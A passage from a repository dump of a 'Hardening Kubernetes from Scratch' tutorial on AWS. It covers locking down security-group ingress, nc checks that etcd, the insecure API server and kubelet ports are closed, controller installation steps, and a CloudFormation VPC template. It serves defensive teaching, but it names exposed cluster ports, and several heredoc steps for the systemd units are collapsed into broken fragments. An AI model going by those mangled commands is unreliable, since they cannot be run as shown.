'Stacks[*].Outputs[?OutputKey==`VPCId`].OutputValue[]' \ 29 | --stack-name ${STACK_NAME} --output text)" 30 | $ SG_ID="$(aws ec2 describe-security-groups --query 'SecurityGroups[*].GroupId' \ 31 | --region ${AWS_DEFAULT_REGION} --filter "Name=vpc-id,Values=${VPC_ID}" --output text)" 32 | ``` 33 | 34 | Add two rules which only allow `tcp/22` for SSH and `tcp/6443` from your source IP address instead of "all": 35 | ``` 36 | $ aws ec2 authorize-security-group-ingress --region ${AWS_DEFAULT_REGION} \ 37 | --group-id ${SG_ID} --protocol tcp --port 22 \ 38 | --cidr $(dig +short myip.opendns.com @resolver1.opendns.com)/32 39 | $ aws ec2 authorize-security-group-ingress --region ${AWS_DEFAULT_REGION} \ 40 | --group-id ${SG_ID} --protocol tcp --port 6443 \ 41 | --cidr $(dig +short myip.opendns.com @resolver1.opendns.com)/32 42 | ``` 43 | Remove the old rule that allowed "all" from your source IP: 44 | ``` 45 | $ aws ec2 revoke-security-group-ingress --region ${AWS_DEFAULT_REGION} \ 46 | --group-id "${SG_ID}" --protocol all --port 0 \ 47 | --cidr $(dig +short myip.opendns.com @resolver1.opendns.com)/32 48 | ``` 49 | 50 | Confirm you can still SSH into your nodes: 51 | ``` 52 | $ export ETCD_IP=$(aws ec2 describe-instances \ 53 | --region ${AWS_DEFAULT_REGION} \ 54 | --filter 'Name=tag:Name,Values=etcd' \ 55 | --query 'Reservations[].Instances[].NetworkInterfaces[0].Association.PublicIp' \ 56 | --output text) 57 | $ export CONTROLLER_IP=$(aws ec2 describe-instances \ 58 | --region ${AWS_DEFAULT_REGION} \ 59 | --filter 'Name=tag:Name,Values=controller' \ 60 | --query 'Reservations[].Instances[].NetworkInterfaces[0].Association.PublicIp' \ 61 | --output text) 62 | $ export WORKER1_IP=$(aws ec2 describe-instances \ 63 | --region ${AWS_DEFAULT_REGION} \ 64 | --filter 'Name=tag:Name,Values=worker-1' \ 65 | --query 'Reservations[].Instances[].NetworkInterfaces[0].Association.PublicIp' \ 66 | --output text) 67 | $ export WORKER2_IP=$(aws ec2 describe-instances \ 68 | --region ${AWS_DEFAULT_REGION} \ 69 | --filter 'Name=tag:Name,Values=worker-2' \ 70 | --query 'Reservations[].Instances[].NetworkInterfaces[0].Association.PublicIp' \ 71 | --output text) 72 | 73 | $ ssh -i ${KEY_NAME}.pem ubuntu@${ETCD_IP} 74 | $ ssh -i ${KEY_NAME}.pem ubuntu@${CONTROLLER_IP} 75 | $ ssh -i ${KEY_NAME}.pem ubuntu@${WORKER1_IP} 76 | $ ssh -i ${KEY_NAME}.pem ubuntu@${WORKER2_IP} 77 | ``` 78 | 79 | Confirm that you can no longer reach `etcd`: 80 | ``` 81 | $ nc -vz ${ETCD_IP} 2379 82 | nc: connectx to ETCD_IP port 2379 (tcp) failed: Operation timed out 83 | ``` 84 | 85 | Confirm that you can no longer reach the Insecure API Server: 86 | ``` 87 | $ nc -vz ${CONTROLLER_IP} 8080 88 | nc: connectx to CONTROLLER_IP port 8080 (tcp) failed: Operation timed out 89 | ``` 90 | 91 | Confirm that you can no longer reach the Kubelet's Read/Write API Service: 92 | ``` 93 | $ nc -vz ${CONTROLLER_IP} 10250 94 | nc: connectx to CONTROLLER_IP port 10250 (tcp) failed: Operation timed out 95 | $ nc -vz ${WORKER1_IP} 10250 96 | nc: connectx to WORKER1_IP port 10250 (tcp) failed: Operation timed out 97 | $ nc -vz ${WORKER2_IP} 10250 98 | nc: connectx to WORKER2_IP port 10250 (tcp) failed: Operation timed out 99 | ``` 100 | 101 | Finally, confirm that you can reach the API Server service on the secure port if it were running. We should expect a "connection refused" error as the request reached the instance and sent a TCP reset because nothing is currently listening on `tcp/6443`: 102 | 103 | ``` 104 | $ nc -vz ${CONTROLLER_IP} 6443 105 | nc: connectx to CONTROLLER_IP port 6443 (tcp) failed: Connection refused 106 | ``` 107 | 108 | Remember that the instance security group has itself listed as being able to access itself. This means that since all instances have this same security group assigned, they can access each other directly. The rules modified here apply to all "external" access control, and we've limited access to just `tcp/22` and `tcp/6443` from our source IP. 109 | 110 | Now, it's time to generate and enable TLS on the Kubernetes API Server service listening on `tcp/6443`. 111 | 112 | [Back](/README.md#level-1-hardening) | [Next](l1-api-tls.md) 113 | -------------------------------------------------------------------------------- /docs/launch-configure-controller.md: -------------------------------------------------------------------------------- 1 | # Launch and Configure the ```controller``` Instance 2 | 3 | ## Instance Creation 4 | From the same shell on the installation system, create the ```controller``` instance 5 | ``` 6 | $ aws ec2 run-instances \ 7 | --region ${AWS_DEFAULT_REGION} \ 8 | --image-id ${IMAGE_ID} \ 9 | --count 1 \ 10 | --instance-type t2.small \ 11 | --key-name ${KEY_NAME} \ 12 | --subnet-id ${SUBNET_ID} \ 13 | --associate-public-ip-address \ 14 | --query 'Instances[0].InstanceId' \ 15 | --tag-specifications 'ResourceType=instance,Tags=[{Key=Name,Value=controller}]' \ 16 | --private-ip-address 10.1.0.10 \ 17 | --block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=32}' \ 18 | --output text 19 | ``` 20 | 21 | Disable Source/Destination Checking for ```kube-proxy``` 22 | ``` 23 | $ aws ec2 modify-instance-attribute \ 24 | --region ${AWS_DEFAULT_REGION} \ 25 | --no-source-dest-check \ 26 | --instance-id "$(aws ec2 describe-instances \ 27 | --region ${AWS_DEFAULT_REGION} \ 28 | --filter 'Name=tag:Name,Values=controller' \ 29 | --query 'Reservations[].Instances[].InstanceId' \ 30 | --output text)" 31 | ``` 32 | 33 | ## Installation and Configuration 34 | 35 | SSH Into the ```controller``` Instance 36 | ``` 37 | $ ssh -i ${KEY_NAME}.pem ubuntu@$(aws ec2 describe-instances \ 38 | --region ${AWS_DEFAULT_REGION} \ 39 | --filter 'Name=tag:Name,Values=controller' \ 40 | --query 'Reservations[].Instances[].NetworkInterfaces[0].Association.PublicIp' \ 41 | --output text) 42 | ``` 43 | 44 | Install Docker and Other Necessary Binaries 45 | ``` 46 | $ sudo apt-get update 47 | $ sudo apt-get install docker.io socat conntrack --yes 48 | ``` 49 | 50 | Configure and Start Docker 51 | ``` 52 | $ echo "DOCKER_OPTS=--ip-masq=false --iptables=false \ 53 | --log-driver=json-file --log-level=warn --log-opt=max-file=5 \ 54 | --log-opt=max-size=10m \ 55 | --storage-driver=overlay" | sudo tee -a /etc/default/docker 56 | $ sudo systemctl daemon-reload 57 | $ sudo systemctl restart docker.service 58 | ``` 59 | 60 | Verify Docker is Running 61 | ``` 62 | $ sudo docker ps 63 | ``` 64 | 65 | Enable Forwarding for ```kube-proxy``` Functions 66 | ``` 67 | $ sudo iptables -P FORWARD ACCEPT 68 | ``` 69 | 70 | Download the Kubernetes Binaries 71 | ``` 72 | $ export K8S_RELEASE="1.9.2" 73 | $ wget -q --show-progress --https-only --timestamping \ 74 | "https://storage.googleapis.com/kubernetes-release/release/v${K8S_RELEASE}/bin/linux/amd64/kube-apiserver" \ 75 | "https://storage.googleapis.com/kubernetes-release/release/v${K8S_RELEASE}/bin/linux/amd64/kube-controller-manager" \ 76 | "https://storage.googleapis.com/kubernetes-release/release/v${K8S_RELEASE}/bin/linux/amd64/kube-scheduler" \ 77 | "https://storage.googleapis.com/kubernetes-release/release/v${K8S_RELEASE}/bin/linux/amd64/kubectl" \ 78 | "https://storage.googleapis.com/kubernetes-release/release/v${K8S_RELEASE}/bin/linux/amd64/kube-proxy" \ 79 | "https://storage.googleapis.com/kubernetes-release/release/v${K8S_RELEASE}/bin/linux/amd64/kubelet" 80 | ``` 81 | 82 | Make the Kubernetes Binaries Executable and Place them in the PATH 83 | ``` 84 | $ chmod +x kube-apiserver kube-controller-manager kube-scheduler kubectl kubelet kube-proxy 85 | $ sudo mv kube-apiserver kube-controller-manager kube-scheduler \ 86 | kubectl kubelet kube-proxy /usr/local/bin/ 87 | ``` 88 | 89 | Create Supporting Directories 90 | ``` 91 | $ sudo mkdir -p \ 92 | /etc/cni/net.d \ 93 | /opt/cni/bin \ 94 | /var/lib/kubelet \ 95 | /var/lib/kube-proxy \ 96 | /var/lib/kubernetes \ 97 | /var/run/kubernetes 98 | ``` 99 | 100 | Download the CNI Plugins for ```kubenet``` 101 | ``` 102 | $ wget -q --show-progress --https-only --timestamping \ 103 | "https://github.com/containernetworking/plugins/releases/download/v0.6.0/cni-plugins-amd64-v0.6.0.tgz" 104 | ``` 105 | 106 | Install the CNI Plugins 107 | ``` 108 | $ sudo tar -xvf cni-plugins-amd64-v0.6.0.tgz -C /opt/cni/bin/ 109 | ``` 110 | 111 | Configure the ```kube-apiserver``` Systemd Unit 112 | ``` 113 | $ cat > kube-apiserver.service < kube-controller-manager.service < kube-scheduler.service < kubelet.service < kubeconfig < kube-proxy.service < etcd.service < kubelet.service < kubeconfig < kube-proxy.service < kubelet.service < kubeconfig < kube-proxy.service < 4m v1.9.2 430 | ip-10-1-0-11 Ready 2m v1.9.2 431 | ip-10-1-0-12 Ready 46s v1.9.2 432 | ``` 433 | 434 | [Back](/README.md#build-the-cluster) | [Next](create-kubeconfig.md) 435 | -------------------------------------------------------------------------------- /etcd.dump: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hardening-kubernetes/from-scratch/983dbe2c225ce62d696791a453a790c5b3b05ad4/etcd.dump -------------------------------------------------------------------------------- /etcdctl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hardening-kubernetes/from-scratch/983dbe2c225ce62d696791a453a790c5b3b05ad4/etcdctl -------------------------------------------------------------------------------- /img/arch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hardening-kubernetes/from-scratch/983dbe2c225ce62d696791a453a790c5b3b05ad4/img/arch.png -------------------------------------------------------------------------------- /templates/hkfs.json: -------------------------------------------------------------------------------- 1 | { 2 | "AWSTemplateFormatVersion": "2010-09-09", 3 | "Description": "AWS CloudFormation Template to hold the Hardening Kubernete from Scratch Tutorial workload", 4 | "Resources": { 5 | "VPC": { 6 | "Type": "AWS::EC2::VPC", 7 | "Properties": { 8 | "CidrBlock": "10.1.0.0/16", 9 | "EnableDnsSupport" : "true", 10 | "EnableDnsHostnames" : "true", 11 | "Tags": [ 12 | { 13 | "Key": "Name", 14 | "Value": "hkfs-vpc" 15 | } 16 | ] 17 | } 18 | }, 19 | "Subnet": { 20 | "Type": "AWS::EC2::Subnet", 21 | "Properties": { 22 | "VpcId": { 23 | "Ref": "VPC" 24 | }, 25 | "CidrBlock": "10.1.0.0/24", 26 | "Tags": [ 27 | { 28 | "Key": "Name", 29 | "Value": "hkfs-subnet" 30 | } 31 | ] 32 | } 33 | }, 34 | "InternetGateway": { 35 | "Type": "AWS::EC2::InternetGateway", 36 | "Properties": { 37 | "Tags": [ 38 | { 39 | "Key": "Name", 40 | "Value": "hkfs-igw" 41 | } 42 | ] 43 | } 44 | }, 45 | "AttachGateway": { 46 | "Type": "AWS::EC2::VPCGatewayAttachment", 47 | "Properties": { 48 | "VpcId": { 49 | "Ref": "VPC" 50 | }, 51 | "InternetGatewayId": { 52 | "Ref": "InternetGateway" 53 | } 54 | } 55 | }, 56 | "RouteTable": { 57 | "Type": "AWS::EC2::RouteTable", 58 | "Properties": { 59 | "VpcId": { 60 | "Ref": "VPC" 61 | }, 62 | "Tags": [ 63 | { 64 | "Key": "Name", 65 | "Value": "hkfs-rt" 66 | } 67 | ] 68 | } 69 | }, 70 | "Route": { 71 | "Type": "AWS::EC2::Route", 72 | "DependsOn": "AttachGateway", 73 | "Properties": { 74 | "RouteTableId": { 75 | "Ref": "RouteTable" 76 | }, 77 | "DestinationCidrBlock": "0.0.0.0/0", 78 | "GatewayId": { 79 | "Ref": "InternetGateway" 80 | } 81 | } 82 | }, 83 | "SubnetRouteTableAssociation": { 84 | "Type": "AWS::EC2::SubnetRouteTableAssociation", 85 | "Properties": { 86 | "SubnetId": { 87 | "Ref": "Subnet" 88 | }, 89 | "RouteTableId": { 90 | "Ref": "RouteTable" 91 | } 92 | } 93 | } 94 | }, 95 | "Outputs": { 96 | "VPCId": { 97 | "Description": "VPCId of the newly created VPC", 98 | "Value": { "Ref":"VPC" } 99 | } 100 | } 101 | } 102 | --------------------------------------------------------------------------------